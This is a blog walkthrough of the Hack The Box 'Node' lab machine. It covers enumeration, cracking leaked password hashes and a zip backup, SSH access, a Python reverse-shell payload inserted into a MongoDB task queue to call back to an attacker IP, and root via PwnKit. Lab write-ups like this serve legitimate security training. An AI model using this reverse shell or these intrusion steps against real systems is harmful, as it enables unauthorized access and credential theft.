NitheshD05 | Cyber Realm

Search

SearchSearch

Node

Apr 16, 20262 min read

HTB Profile Image

Ping

Nmap Scans

mapit 10.10.10.58

Nmap Default Scan

Nmap Service and Script Scan

Nmap All Port Scan

On port 3000

Feroxbuster

feroxbuster --url https://10.10.10.58:3000 -k -o feroxbuster.txt

Can’t get any useful info

Will analyse the source code We have lit of java script file, always look for sensitive info in .js files

As guessed, we got some sensitive info from http://10.10.10.58:3000/assets/js/app/app.js

Will navigate to the page http://10.10.10.58:3000/partials/admin.html We got something…!

But only admin user can download the file

Will enumerate more, can get more paths in http://10.10.10.58:3000/assets/js/app/controllers/home.js can see /api/user/latest

This gives us info http://10.10.10.58:3000/api/users/

decrypted all the hash using crackstaion https://crackstation.net/ Have encrypted three out of 4 hash

Credentials myP14ceAdm1nAcc0uNT:manchester tom:spongebob mark:snowflake

Will try this creds to login First with admin cred Worked…!

Will download and analyse the content

After analysing the content its looks like base64 encoded, will decode it

cat myplace.backup | base64 --decode > backup.decoded

I have opened the file, but it is in some unsupported format, will analyse the file time now

It is a zip file, will unzip it It is asking password

Will find password

zip2john backup.decoded > backup.hash

john --wordlist=/usr/share/wordlists/rockyou.txt backup.hash

Found it…! magicword

After unzipping, there is new directory var, will explore Found mark’s Password: mark:5AYRft73VtFpc84k

Will ssh now with marks’ cred

ssh mark@10.10.10.58

Can find user.txt in tom’s home directory but we don’t have permissions

We can see pkexec in SUID

find / -perm -u=s -type f 2>/dev/null

pkexec version is vulnerable

pkexec --version

Using mongodb to get user tom access

mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler

show collections          \\list databse tables
db.tasks.find().pretty()   \\to list content of table tasks

db.tasks.insert({cmd: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.10\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"})
WriteResult({ "nInserted" : 1 })   \\insert a reverse shell code in table tasks

Will set a Netcat listener \

Using Pkexec Vulnerable version I have escalated my privileges to root

Used PwnKit

Root.txt

User.txt

Done with Node…:)

Backlinks

Graph View